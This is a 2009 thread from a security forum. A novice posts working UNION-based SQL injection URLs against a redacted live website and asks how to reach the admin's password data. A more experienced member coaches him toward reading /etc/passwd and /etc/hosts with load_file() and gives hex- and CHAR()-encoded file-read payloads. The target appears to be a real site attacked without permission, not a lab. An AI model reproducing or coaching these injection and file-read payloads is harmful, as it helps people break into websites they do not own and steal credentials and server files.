Waraxe IT Security Portal
Login or Register
June 17, 2025
Menu
Home
Logout
Discussions
Forums
Members List
IRC chat
Tools
Base64 coder
MD5 hash
CRC32 checksum
ROT13 coder
SHA-1 hash
URL-decoder
Sql Char Encoder
Affiliates
y3dips ITsec
Md5 Cracker
User Manuals
AlbumNow
Content
Content
Sections
FAQ
Top
Info
Feedback
Recommend Us
Search
Journal
Your Account
User Info
Welcome, Anonymous
Nickname
Password
(Register)

Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144

People Online:
Visitors: 112
Members: 0
Total: 112
Full disclosure
SEC Consult SA-20250604-0 :: Local Privilege Escalation and Default Credentials in INDAMED - MEDICAL OFFICE (Medical practice management) Demo version
Full Disclosure: CVE-2025-31200 & CVE-2025-31201 – 0-Click iMessage Chain ? Secure Enclave Key Theft, Wormable RCE, Crypto Theft
Defense in depth -- the Microsoft way (part 89): user grouppolicies don't deserve tamper protection
CVE-2025-45542: Time-Based Blind SQL Injection in CloudClassroom PHP Project v1.0
ERPNext v15.53.1 Stored XSS in bio Field Allows Arbitrary Script Execution in Profile Page
ERPNext v15.53.1 Stored XSS in user_image Field Allows Script Execution via Injected Image Path
Local information disclosure in apport and systemd-coredump
Stored XSS via File Upload - adaptcmsv3.0.3
IDOR "Change Password" Functionality - adaptcmsv3.0.3
Stored XSS "Send Message" Functionality - adaptcmsv3.0.3
Authenticated File Upload to RCE - adaptcmsv3.0.3
Stored XSS in "Description" Functionality - cubecartv6.5.9
Multiple Vulnerabilities in SAP GuiXT Scripting
CVE-2024-47081: Netrc credential leak in PSF requests library
Exploit CVE-2019-9978: Remote Code Execution in Social Warfare WordPress Plugin (<= 3.5.2)
Log in Register Forum FAQ Memberlist Search
IT Security and Insecurity Portal

www.waraxe.us Forum Index -> Sql injection -> i Can not grant access ...
Post new topicReply to topic View previous topic :: View next topic
i Can not grant access ...
PostPosted: Tue Oct 06, 2009 6:23 pm Reply with quote
bizzare
Regular user
Regular user
Joined: Oct 06, 2009
Posts: 5




hey guys , im bob and im new to Sql injection attack and my question is that : i have a vulnerability in this site :
Code:
www.***.com/article.php?id=-77+union+select+0,group_concat(table_name),2,3,4,5,6,7,8,9+from+information_schema.tables--

the result is contain all of default tables of mysql 5.0.81-community and 2 table that named [ press , articles ]
result =
Code:
CHARACTER_SETS,COLLATIONS,COLLATION_CHARACTER_SET_APPLICABILITY,COLUMNS,COLUMN_PRIVILEGES,KEY_COLUMN_USAGE,PROFILING,ROUTINES,SCHEMATA,SCHEMA_PRIVILEGES,STATISTICS,TABLES,TABLE_CONSTRAINTS,TABLE_PRIVILEGES,TRIGGERS,USER_PRIVILEGES,VIEWS,articles,press

i cant grant access to mysql.user i want the table that contain the users informations.
log in page :
Code:
www.***.com/admin

plz help me ... Wink
View user's profile Send private message
PostPosted: Wed Oct 07, 2009 5:19 am Reply with quote
pexli
Valuable expert
Valuable expert
Joined: May 24, 2007
Posts: 665
Location: Bulgaria




Only root have access to mysql.user table.
View user's profile Send private message
?
PostPosted: Wed Oct 07, 2009 6:35 am Reply with quote
bizzare
Regular user
Regular user
Joined: Oct 06, 2009
Posts: 5




its mean that this web page is not vulnerable to hack ? Embarassed
View user's profile Send private message
PostPosted: Wed Oct 07, 2009 7:17 am Reply with quote
pexli
Valuable expert
Valuable expert
Joined: May 24, 2007
Posts: 665
Location: Bulgaria




This mean you search admin hash/password in wrong place.
View user's profile Send private message
load_file
PostPosted: Wed Oct 07, 2009 5:05 pm Reply with quote
bizzare
Regular user
Regular user
Joined: Oct 06, 2009
Posts: 5




pexli , you know , im trying to use load_file() function , it seems that i have read access to this host.just i want to know how i can retrieve host name , or host version , i.e. windows server 2003 or linux.
if you want more information about this target , contain address and anyother things , please tell me.
tnx. Cool
View user's profile Send private message
Re: load_file
PostPosted: Wed Oct 07, 2009 6:26 pm Reply with quote
pexli
Valuable expert
Valuable expert
Joined: May 24, 2007
Posts: 665
Location: Bulgaria




bizzare wrote:
pexli , you know , im trying to use load_file() function , it seems that i have read access to this host.just i want to know how i can retrieve host name , or host version , i.e. windows server 2003 or linux.
if you want more information about this target , contain address and anyother things , please tell me.
tnx. Cool


Well.Try to read /etc/hosts or /etc/passwd.If you see results probably you are on linux server.
View user's profile Send private message
load_file()
PostPosted: Wed Oct 07, 2009 8:04 pm Reply with quote
bizzare
Regular user
Regular user
Joined: Oct 06, 2009
Posts: 5




right , pexli i use this string and i have not any result check it please :
Code:
http://www.***.com/article.php?id=-88+union+select+1,load_file%280x2F6574632F706173737764%29,3,4,5,6,7,8,9,10--

Code:
0x2F6574632F706173737764 = /etc/passwd

also i try this :
Code:
/etc/hosts

i think that im use load_file() function incorrectly.is it ?
View user's profile Send private message
server information :
PostPosted: Wed Oct 07, 2009 8:29 pm Reply with quote
bizzare
Regular user
Regular user
Joined: Oct 06, 2009
Posts: 5




Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a DAV/2 mod_bwlimited/1.4 PHP/5.2.10 mod_wsgi/2.5 Python/2.5.2 Server at www.***.com Port 80
View user's profile Send private message
PostPosted: Thu Oct 08, 2009 8:08 am Reply with quote
pexli
Valuable expert
Valuable expert
Joined: May 24, 2007
Posts: 665
Location: Bulgaria




load_file(CONCAT(CHAR(39),CHAR(47),CHAR(101),CHAR(116),CHAR(99),CHAR(47),CHAR(104),CHAR(111),CHAR(115),CHAR(116),CHAR(115),CHAR(39)))

load_file(0x272f6574632f686f73747327)

load_file%280x272f6574632f686f73747327%29
View user's profile Send private message
i Can not grant access ...
www.waraxe.us Forum Index -> Sql injection
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
All times are GMT
Page 1 of 1

Post new topicReply to topic


Powered by phpBB © 2001-2008 phpBB Group



PCWizardHub - Helping you fix, build, and optimize your PC life
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2024 Janek Vind "waraxe"
Page Generation: 0.040 Seconds